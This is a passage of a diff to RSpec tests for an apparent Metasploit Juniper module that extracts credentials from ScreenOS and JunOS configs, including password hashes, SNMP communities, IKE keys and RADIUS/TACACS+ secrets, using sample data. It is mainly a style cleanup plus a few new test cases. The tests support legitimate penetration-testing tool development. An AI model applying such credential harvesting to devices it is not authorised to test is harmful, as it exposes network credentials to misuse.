           port: 1337,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "testuser",
-          jtr_format: "sha1",
-          private_data: "02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'testuser',
+          jtr_format: 'sha1',
+          private_data: '02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
 
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
-        "set user \"testuser\" uid 1\n" <<
-        "set user \"testuser\" type auth\n" <<
-        "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
-        "set user \"testuser\" enable\n")
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
+                                                "set user \"testuser\" uid 1\n" <<
+                                                "set user \"testuser\" type auth\n" <<
+                                                "set user \"testuser\" hash-password \"02b0jt2gZGipCiIEgl4eainqZIKzjSNQYLIwE=\"\n" <<
+                                                "set user \"testuser\" enable\n")
     end
 
     context 'deals with snmp-server community' do
-
       it 'with Read permission' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Only')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "sales",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'sales',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RO'
           }
         )
-        aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Only Trap-on traffic version v1')
+        aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Only Trap-on traffic version v1')
       end
 
       it 'with Read-Write permission' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community sales with permissions Read-Write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "sales",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'sales',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set snmp community "sales" Read-Write Trap-on traffic version v1')
+        aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set snmp community "sales" Read-Write Trap-on traffic version v1')
       end
-
     end
 
     it 'deals with ppp configurations' do
       expect(aux_juniper).to receive(:print_good).with('PPTP Profile ISP with username username hash fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA== via pap')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:store_loot).with(
-        "juniper.netscreen.config", "text/plain", "127.0.0.1",
-          "setppp profile \"ISP\" auth type pap\n" <<
-          "setppp profile \"ISP\" auth local-name \"username\"\n" <<
-          "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"",
-        "config.txt", "Juniper Netscreen Configuration"
+        'juniper.netscreen.config', 'text/plain', '127.0.0.1',
+        "setppp profile \"ISP\" auth type pap\n" <<
+        "setppp profile \"ISP\" auth local-name \"username\"\n" <<
+        'setppp profile "ISP" auth secret "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA=="',
+        'config.txt', 'Juniper Netscreen Configuration'
       )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 1723,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'pptp',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "username",
-          private_data: "fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'username',
+          private_data: 'fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,
-        "setppp profile \"ISP\" auth type pap\n" <<
-        "setppp profile \"ISP\" auth local-name \"username\"\n" <<
-        "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n"
-      )
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337,
+                                                "setppp profile \"ISP\" auth type pap\n" <<
+                                                "setppp profile \"ISP\" auth local-name \"username\"\n" <<
+                                                "setppp profile \"ISP\" auth secret \"fzSzAn31N4Sbh/sukoCDLvhJEdn0DVK7vA==\"\n")
     end
 
     it 'deals with ike configurations' do
       expect(aux_juniper).to receive(:print_good).with('IKE Profile To-Cisco to 2.2.2.1 with password netscreen via pre-g2-des-sha')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper ScreenOS'})
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper ScreenOS' })
       expect(aux_juniper).to receive(:store_loot).with(
-        "juniper.netscreen.config", "text/plain", "127.0.0.1",
-        "set ike gateway \"To-Cisco\" address 2.2.2.1 Main outgoing-interface \"ethernet1\" preshare \"netscreen\" proposal \"pre-g2-des-sha\"",
-        "config.txt", "Juniper Netscreen Configuration"
+        'juniper.netscreen.config', 'text/plain', '127.0.0.1',
+        'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"',
+        'config.txt', 'Juniper Netscreen Configuration'
       )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "2.2.2.1",
+          address: '2.2.2.1',
           port: 500,
-          protocol: "udp",
+          protocol: 'udp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: 'ike',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "netscreen",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          private_data: 'netscreen',
           private_type: :password,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_screenos_config_eater('127.0.0.1',1337,'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
+      aux_juniper.juniper_screenos_config_eater('127.0.0.1', 1337, 'set ike gateway "To-Cisco" address 2.2.2.1 Main outgoing-interface "ethernet1" preshare "netscreen" proposal "pre-g2-des-sha"')
     end
-
   end
 
   context '#juniper_junos_config_eater' do
@@ -248,63 +247,135 @@ RSpec.describe Msf::Auxiliary::Juniper do
 
     it 'deals with root credentials' do
       expect(aux_juniper).to receive(:print_good).with('root password hash: $1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      #expect(aux_juniper).to receive(:store_loot).with(
+      expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+      # expect(aux_juniper).to receive(:store_loot).with(
       #  "juniper.netscreen.config", "text/plain", "127.0.0.1", "enable password 1511021F0725", "config.txt", "Cisco IOS Configuration"
-      #)
+      # )
       expect(aux_juniper).to receive(:create_credential_and_login).with(
         {
-          address: "127.0.0.1",
+          address: '127.0.0.1',
           port: 161,
-          protocol: "tcp",
+          protocol: 'tcp',
           workspace_id: workspace.id,
           origin_type: :service,
           service_name: '',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          username: "root",
-          private_data: "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.",
-          jtr_format: "md5",
+          module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+          username: 'root',
+          private_data: '$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E.',
+          jtr_format: 'md5',
           private_type: :nonreplayable_hash,
           status: Metasploit::Model::Login::Status::UNTRIED
         }
       )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',161,
-        %q(system {
+      aux_juniper.juniper_junos_config_eater('127.0.0.1', 161,
+                                             %q(system {
              root-authentication {
                encrypted-password "$1$pz9b1.fq$foo5r85Ql8mXdoRUe0C1E."; ## SECRET-DATA
              }
            }
-        )
-      )
+        ))
     end
 
-    context 'deals with user account with password hash' do
-      it 'with super-user' do
-        expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser {\n                         uid 2000;\n                         class super-user;\n                         authentication {\n                             encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+    context 'deals tacplus-server blocks' do
+      it 'with one cred' do
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "tacplus-server {\n                                                1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n                                            }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser",
-            jtr_format: "md5",
-            private_data: "$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            jtr_format: '',
+            private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(tacplus-server {
+                                                1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
+                                            }))
+      end
+      it 'with two cred' do
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 1.1.1.1 with password hash $9$aaAAAAAeAA1AAAb2AAjAqmAA')
+        expect(aux_juniper).to receive(:print_good).with('tacplus server 2.2.2.2 with password hash $9$aaaAa/1aAAAa1aaaAAaa11aAA')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "tacplus-server {\n                                                1.1.1.1 secret \"$9$aaAAAAAeAA1AAAb2AAjAqmAA\"; ## SECRET-DATA\n                                                2.2.2.2 secret \"$9$aaaAa/1aAAAa1aaaAAaa11aAA\"; ## SECRET-DATA\n                                            }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$aaAAAAAeAA1AAAb2AAjAqmAA',
+            jtr_format: '',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: '$9$aaaAa/1aAAAa1aaaAAaa11aAA',
+            jtr_format: '',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(tacplus-server {
+                                                1.1.1.1 secret "$9$aaAAAAAeAA1AAAb2AAjAqmAA"; ## SECRET-DATA
+                                                2.2.2.2 secret "$9$aaaAa/1aAAAa1aaaAAaa11aAA"; ## SECRET-DATA
+                                            }))
+      end
+    end
+    context 'deals with user account with password hash' do
+      it 'with super-user' do
+        expect(aux_juniper).to receive(:print_good).with('User 2000 named newuser in group super-user found with password hash $1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/.')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser {\n                         uid 2000;\n                         class super-user;\n                         authentication {\n                             encrypted-password \"$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser',
+            jtr_format: 'md5',
+            private_data: '$1$rm8FaMFY$k4LFxqsVAiGO5tKqyO9jJ/',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser {
                          uid 2000;
@@ -315,36 +386,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with operator' do
         expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group operator found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser2 {\n                         uid 2002;\n                         class operator;\n                         authentication {\n                             encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser2 {\n                         uid 2002;\n                         class operator;\n                         authentication {\n                             encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser2",
-            jtr_format: "md5",
-            private_data: "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser2',
+            jtr_format: 'md5',
+            private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser2 {
                          uid 2002;
@@ -355,36 +424,73 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
-      it 'with read-only' do
-        expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser3 {\n                         uid 2003;\n                         class read-only;\n                         authentication {\n                             encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+      it 'with a full-name and custom class' do
+        expect(aux_juniper).to receive(:print_good).with('User 2002 named newuser2 in group EXAMPLE found with password hash $1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0.')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n            login {\n                user newuser2 {\n                    full-name \"test\";\n                    uid 2002;\n                    class EXAMPLE;\n                    authentication {\n                        encrypted-password \"$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0\"; ## SECRET-DATA\n                    }\n                }\n            }\n        }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser3",
-            jtr_format: "md5",
-            private_data: "$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser2',
+            jtr_format: 'md5',
+            private_data: '$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
+            login {
+                user newuser2 {
+                    full-name "test";
+                    uid 2002;
+                    class EXAMPLE;
+                    authentication {
+                        encrypted-password "$1$aDZi44AP$bQGGjqPJ.F.Cm5QvX2yaa0"; ## SECRET-DATA
+                    }
+                }
+            }
+        }
+     ))
+      end
+
+      it 'with read-only' do
+        expect(aux_juniper).to receive(:print_good).with('User 2003 named newuser3 in group read-only found with password hash $1$1.YvKzUY$dcAj99KngGhFZTpxGjA93..')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser3 {\n                         uid 2003;\n                         class read-only;\n                         authentication {\n                             encrypted-password \"$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 1337,
+            protocol: 'tcp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: '',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser3',
+            jtr_format: 'md5',
+            private_data: '$1$1.YvKzUY$dcAj99KngGhFZTpxGjA93.',
+            private_type: :nonreplayable_hash,
+            status: Metasploit::Model::Login::Status::UNTRIED
+          }
+        )
+
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser3 {
                          uid 2003;
@@ -395,36 +501,34 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with unauthorized' do
         expect(aux_juniper).to receive(:print_good).with('User 2004 named newuser4 in group unauthorized found with password hash $1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/.')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-        expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-          "system {\n                 login {\n                     user newuser4 {\n                         uid 2004;\n                         class unauthorized;\n                         authentication {\n                             encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
-          "config.txt", "Juniper JunOS Configuration"
-        )
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:store_loot).with('juniper.junos.config', 'text/plain', '127.0.0.1',
+                                                         "system {\n                 login {\n                     user newuser4 {\n                         uid 2004;\n                         class unauthorized;\n                         authentication {\n                             encrypted-password \"$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/\"; ## SECRET-DATA\n                         }\n                     }\n                 }\n             }",
+                                                         'config.txt', 'Juniper JunOS Configuration')
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 1337,
-            protocol: "tcp",
+            protocol: 'tcp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: '',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            username: "newuser4",
-            jtr_format: "md5",
-            private_data: "$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            username: 'newuser4',
+            jtr_format: 'md5',
+            private_data: '$1$bdWYaqOE$z6oTSJS3p1R8CoNaos9Ce/',
             private_type: :nonreplayable_hash,
             status: Metasploit::Model::Login::Status::UNTRIED
           }
         )
 
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(system {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(system {
                  login {
                      user newuser4 {
                          uid 2004;
@@ -435,160 +539,221 @@ RSpec.describe Msf::Auxiliary::Juniper do
                      }
                  }
              }
-          )
-        )
+          ))
       end
-
     end
 
     context 'deals with snmp-server community' do
-
       it 'with Read permissions' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community read with permissions read-only')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "read",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'read',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RO'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community read {
                      authorization read-only;
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with Read-Write permissions and view' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community write with permissions read-write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "write",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'write',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community write {
                      view jweb-view-all;
                      authorization read-write;
                  }
              }
-          )
-        )
+          ))
       end
 
       it 'with a space in the community string' do
         expect(aux_juniper).to receive(:print_good).with('SNMP community hello there with permissions read-write')
-        expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
         expect(aux_juniper).to receive(:create_credential_and_login).with(
           {
-            address: "127.0.0.1",
+            address: '127.0.0.1',
             port: 161,
-            protocol: "udp",
+            protocol: 'udp',
             workspace_id: workspace.id,
             origin_type: :service,
             service_name: 'snmp',
-            module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-            private_data: "hello there",
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'hello there',
             private_type: :password,
             status: Metasploit::Model::Login::Status::UNTRIED,
             access_level: 'RW'
           }
         )
-        aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-          %q(snmp {
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
                  community "hello there" {
                      authorization read-write;
                  }
              }
-          )
-        )
+          ))
       end
 
-
+      it 'with special characters in the community string' do
+        expect(aux_juniper).to receive(:print_good).with('SNMP community aAa321$+!AaAaaa with permissions read-only')
+        expect(aux_juniper).to receive(:report_host).with({ host: '127.0.0.1', os_name: 'Juniper JunOS' })
+        expect(aux_juniper).to receive(:create_credential_and_login).with(
+          {
+            address: '127.0.0.1',
+            port: 161,
+            protocol: 'udp',
+            workspace_id: workspace.id,
+            origin_type: :service,
+            service_name: 'snmp',
+            module_fullname: 'auxiliary/scanner/snmp/juniper_dummy',
+            private_data: 'aAa321$+!AaAaaa',
+            private_type: :password,
+            status: Metasploit::Model::Login::Status::UNTRIED,
+            access_level: 'RO'
+          }
+        )
+        aux_juniper.juniper_junos_config_eater('127.0.0.1', 1337,
+                                               %q(snmp {
+                 community "aAa321$+!AaAaaa" {
+                     authorization read-only;
+                 }
+             }
+          ))
+      end
     end
-
-    it 'deals with radius' do
-      expect(aux_juniper).to receive(:print_good).with('radius server 1.1.1.1 password hash: $9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV')
-      expect(aux_juniper).to receive(:report_host).with({:host => '127.0.0.1', :os_name => 'Juniper JunOS'})
-      expect(aux_juniper).to receive(:store_loot).with("juniper.junos.config", "text/plain", "127.0.0.1",
-        "access {\n              radius-server {\n                  1.1.1.1 secret \"$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV\"; ## SECRET-DATA\n              }\n           }",
-        "config.txt", "Juniper JunOS Configuration"
-      )
-      expect(aux_juniper).to receive(:create_credential_and_login).with(
-        {
-          address: "1.1.1.1",
-          port: 1812,
-          protocol: "udp",
-          workspace_id: workspace.id,
-          origin_type: :service,
-          service_name: 'radius',
-          module_fullname: "auxiliary/scanner/snmp/juniper_dummy",
-          private_data: "$9$Y-4GikqfF39JGCu1Ileq.PQ6AB1hrlMBIyKvWdV",
-          private_type: :nonreplayable_hash,
-          status: Metasploit::Model::Login::Status::UNTRIED
-        }
-      )
-      aux_juniper.juniper_junos_config_eater('127.0.0.1',1337,
-        %q(access {
